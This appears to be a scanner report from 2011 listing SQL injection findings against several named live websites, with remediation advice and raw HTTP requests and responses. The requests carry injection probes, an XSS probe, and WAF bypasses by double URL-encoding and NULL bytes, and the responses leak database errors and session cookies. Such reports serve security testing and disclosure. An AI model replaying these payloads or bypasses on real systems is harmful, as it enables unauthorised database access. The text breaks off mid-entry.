SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The h parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d1--%20&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 21:04:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
...[SNIP]... <!-- 1 697 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Shavlik</title>
GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d2--%20&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 21:04:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
...[SNIP]... <!-- 0 697 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Shavlik</title>
The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /shavlik/index.cfm?m=1009'&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f9062&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Fri, 25 Mar 2011 20:42:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
...[SNIP]... <font style="COLOR: black; FONT: 8pt/11pt verdana"> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21 ORDER BY DMMESSAGE.ID' at line 7 </font> ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /xml/jasmin/get/110325-1413%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=
Response 1
HTTP/1.1 503 Service Temporarily Unavailable Date: Sat, 26 Mar 2011 00:25:33 GMT Server: Apache Vary: Accept-Encoding Content-Length: 388 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>503 Service Temporarily Unavailable</title> </head><body> <h1>Service Temporarily Unavailable</h1> <p>The server is temporarily u ...[SNIP]...
Request 2
GET /xml/jasmin/get/110325-1413%2527%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=
Response 2
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 00:25:33 GMT Server: Apache Expires: Sat, 26 Mar 2011 00:35:33 GMT Cache-Control: max-age=600 Cache-Control: private Content-Type: text/javascript;charset=utf-8 Content-Length: 85939
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00' User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=
Response 1
HTTP/1.1 503 Service Temporarily Unavailable Date: Sat, 26 Mar 2011 00:24:37 GMT Server: Apache Vary: Accept-Encoding Content-Length: 388 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>503 Service Temporarily Unavailable</title> </head><body> <h1>Service Temporarily Unavailable</h1> <p>The server is temporarily u ...[SNIP]...
Request 2
GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00'' User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=
Response 2
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 00:24:37 GMT Server: Apache Expires: Sat, 26 Mar 2011 00:34:37 GMT Cache-Control: max-age=600 Cache-Control: private Content-Type: text/javascript;charset=utf-8 Content-Length: 302658
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow'/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadfl' at line 5
Request 2
GET /ppc/leadflow''/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00'/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadfl' at line 5
Request 2
GET /ppc/leadflow/hins00''/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/leadflow'/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow''/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/leadflow/hins00'/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow/hins00''/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
